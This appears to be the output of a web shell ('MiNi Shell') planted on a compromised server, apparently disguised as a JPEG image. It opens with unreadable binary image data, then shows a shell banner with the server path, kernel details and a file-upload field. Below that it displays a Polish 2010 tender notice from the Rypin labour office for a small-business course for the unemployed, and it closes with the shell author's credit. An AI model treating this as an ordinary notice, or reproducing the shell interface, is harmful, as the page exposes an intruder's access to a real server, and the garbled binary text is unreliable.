JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100122/19332-N-2010.html

<p class="kh_header"><b>Rypin: kurs dla bezrobotnych</b><br>
<b>Numer ogłoszenia: 19332 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Nowy Rynek 14, 87-500 Rypin, woj. kujawsko-pomorskie, tel. 0-54 280-21-44, faks 0-54 280-24-79.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> kurs dla bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> kurs dla bezrobotnych - Mała przedsiebiorczość.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu może wziąć udział Wykonawca, który spełnia warunki określone                      w art. 22  ust. 1 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych                        (Dz. U. z 2007r. nr 223, poz. 1655 z późn. zm.) dotyczące: 
1)	posiadania uprawnień do wykonywania działalności lub czynności z zakresu przedmiotu zamówienia,
2)	posiadania wiedzy i doświadczenia,
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi          do wykonania zamówienia,
4)	sytuacji ekonomicznej i finansowej.    
  
2. W postępowaniu może wziąć udział Wykonawca, co do którego brak podstaw                    do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 i 2.
3. Zamawiający dokona oceny spełnienia warunków, o których mowa w ust. 1 i 2                        na podstawie treści złożonych przez Wykonawcę dokumentów i oświadczeń wymaganych.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wszystkie elementy oferty zawarte w załącznikach powinny być wymienione                   w odpowiedniej kolejności.

W celu wykazania spełniania przez wykonawcę warunków, o których mowa                        w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych Zamawiający żąda następujących dokumentów:
oświadczenia Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 pkt. 1-4 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych                               (Dz. U. z 2007r., nr 223, poz.1655 z późn. zm.), zgodnie ze wzorem stanowiącym załącznik nr 2; potwierdzenie spełniania warunków, o których mowa                             w art. 22 ust. 1 pkt 1 - 4 musi zostać wykazane, zgodnie z art. 26 ust. 2a                    w/w Ustawy, nie później niż na dzień składania ofert;
wykazu wykonanych usług w zakresie przedmiotu zamówienia, tj. zrealizowanych szkoleń w tym zakresie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie                   (referencje);  
wykazu narzędzi, urządzeń i sprzętu dostępnych wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami; 
jeżeli wykonawca wskaże narzędzia, urządzenia i sprzęty, którymi będzie dysponował należy dołączyć pisemne zobowiązanie innych podmiotów                     do udostępnienia niezbędnych do wykonania zamówienia narzędzi, urządzeń                     i sprzętu;
	Zamawiający prosi o nie wymienianie sprzętu (wyposażenia), które nie ma związku z kursem będącym przedmiotem zamówienia i nie będzie wykorzystywany do jego realizacji, a znajduje się na wyposażeniu bazy lokalowej;
oświadczenia Wykonawcy o zapewnieniu bazy zajęć teoretycznych i praktycznych  do realizacji kursu, zgodnie ze wzorem stanowiącym załącznik nr 3;
szczegółowego opisu bazy zajęć teoretycznych i praktycznych ze wskazaniem dokładnego adresu (opisać te sale, w których faktycznie będą realizowane zajęcia      i z których uczestnicy kursu będą rzeczywiście korzystać z wyszczególnieniem ilości, rodzaju i typu sprzętu);                 
wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia                          wraz z informacjami na temat ich wykształcenia, kwalifikacji zawodowych, doświadczenia zawodowego, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (np. w postaci C.V., kserokopii świadectw, dyplomów, zaświadczeń itp.) oraz informacją o podstawie                        do dysponowania tymi osobami; 
oświadczenia, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Zamawiający żąda następujących dokumentów:
oświadczenie Wykonawcy, że brak podstaw do wykluczenia z postępowania                z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 Ustawy                 z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2007r., nr 223, poz.1655 z późn. zm.), zgodnie ze wzorem stanowiącym załącznik nr 4; potwierdzenie dotyczące braku podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust 1 musi zostać wykazane, zgodnie                    z art. 26 ust. 2a w/w Ustawy, nie później niż na dzień składania ofert;
aktualny odpis z właściwego rejestru sądowego albo aktualne zaświadczenie              o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłaceniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
aktualne zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzające,           że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne               i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
aktualne zaświadczenie o wpisie Wykonawcy do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę Wykonawcy (podstawa prawna: art. 20 ustawy z dnia 20 kwietnia 2004 r.                   o promocji zatrudnienia i instytucjach rynku pracy - Dz. U. z 2008 r. Nr 69,                   poz. 415 z późn. zm.).

W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym   przez Zamawiającego, Zamawiający żąda:
szczegółowego programu szkolenia, uwzględniającego wytyczne zawarte                 w rozdziale III pkt 6, tematykę i liczbę godzin określoną w niniejszej specyfikacji,
oświadczenia o ubezpieczeniu osób szkolonych, wskazanych przez   Zamawiającego, od następstw nieszczęśliwych wypadków wraz z informacją                      o wysokości kosztu ubezpieczenia przypadającego na jedną osobę,
oświadczenia o współpracy wykładowców w ramach realizacji przedmiotu zamówienia,
wzoru zaświadczenia o ukończeniu kursu,
zatwierdzonego przez Wykonawcę wzoru umowy, stanowiącego załącznik nr 5       do SIWZ.

Wykonawca do oferty musi załączyć również preliminarz kosztów szkolenia (koszt szkolenia ogółem, jednostkowy koszt szkolenia, koszt osobogodziny szkolenia), przy czym załączona kalkulacja ceny oferty powinna zawierać w osobnych pozycjach     co najmniej:
koszt szkolenia,
koszty materiałów,
koszty eksploatacji, pomieszczeń i sprzętu,
koszty serwisu kawowego, itp.
W preliminarzu kosztów szkolenia nie należy uwzględniać kosztów ubezpieczenia osób szkolonych.

Warunki dla Wykonawcy dotyczące realizacji przedmiotu zamówienia;
Wykonawca musi przedstawić program szkolenia zawierający w szczególności: 
nazwę i zakres szkolenia,
czas trwania i sposób organizacji szkolenia, 
wymagania wstępne dla uczestników szkolenia,
cele szkolenia,
ramowy program nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej - szczegółowe bloki tematyczne oraz czasowy program realizacji szkolenia ze wskazaniem ilości godzin przeznaczonych na realizację poszczególnych zagadnień teoretycznych                      i praktycznych oraz wskazanie nazwiska wykładowcy, który będzie realizował dany zakres tematyczny,
treści szkolenia zgodne z wymaganymi zagadnieniami zawartymi w rozdziale III pkt 6 niniejszej specyfikacji,
wykazy literatury, środków i materiałów dydaktycznych,
sposób sprawdzenia efektów szkolenia z załączeniem wzoru ankiety służącej           do oceny kursu.

Dostarczenie Zamawiającemu harmonogramu zajęć, uwzględniającego: temat zajęć, treści szkolenia omawiane na zajęciach, godzinowy rozkład zajęć w danym dniu, nazwisko wykładowcy prowadzącego dane zajęcia, miejsce realizacji zajęć,                     w terminie 7 dni od dnia rozstrzygnięcia postępowania, przy czym termin rozpoczęcia kursu musi być uprzednio zatwierdzony przez Zamawiającego.

Zapewnienie uczestnikom szkolenia warunków zgodnych z przepisami bezpieczeństwa    i higieny pracy w trakcie trwania szkolenia.

Wskazanie dokładnego adresu miejsca realizacji szkolenia teoretycznego                  i praktycznego.

Wykonawca musi zapewnić każdemu z uczestników swobodne wykonywanie ćwiczeń praktycznych tj. maksymalnie 2 osoby do 1 kasy fiskalnej, czyli dla całej grupy uczestników musi być zapewnione minimum 8 kas fiskalnych.

Wykonawca musi  zapewnić, w ramach kosztu szkolenia, wszystkie niezbędne materiały szkoleniowe i środki dydaktyczne dla każdego uczestnika szkolenia m.in.: materiały piśmiennicze: długopisy, zeszyty,  itp.

Wykonawca musi powierzyć realizację szkolenia wykładowcom posiadającym:
do prowadzenia zajęć zawartych w modułach I, II, III:
wykształcenie wyższe z zakresu finanse i rachunkowość lub ekonomia oraz doświadczenie zawodowe w wykonywaniu pracy związanej z nauczaniem przedmiotów z zakresu wyżej określonego wykształcenia jak również doświadczenie w zakresie prowadzenia kursów o tematyce związanej z przedmiotem zamówienia;
do prowadzenia zajęć zawartych w module IV:
minimum wykształcenie średnie oraz ukończone szkolenie z zakresu obsługi                i programowania kas fiskalnych potwierdzone legitymacją serwisanta kas rejestrujących.





Dokumenty składane są w oryginale lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
We wszelkich sprawach nie uregulowanych w niniejszej SIWZ mają zastosowanie przepisy ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. nr 223,                    poz. 1655 z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 55</li>
<li>2 - Program szkolenia - 15</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 15</li>
<li>4 - Baza lokalowa i wyposażenie w sprzęt i pomoce dydaktyczne - 5</li>
<li>5 - Doświadczenie w zakresie objętym przedmiotem zamówienia - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup.rypin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Rypinie
ul. Nowy Rynek 14
87-500 Rypin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Rypinie
ul. Nowy Rynek 14
87-500 Rypin
pokój nr 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com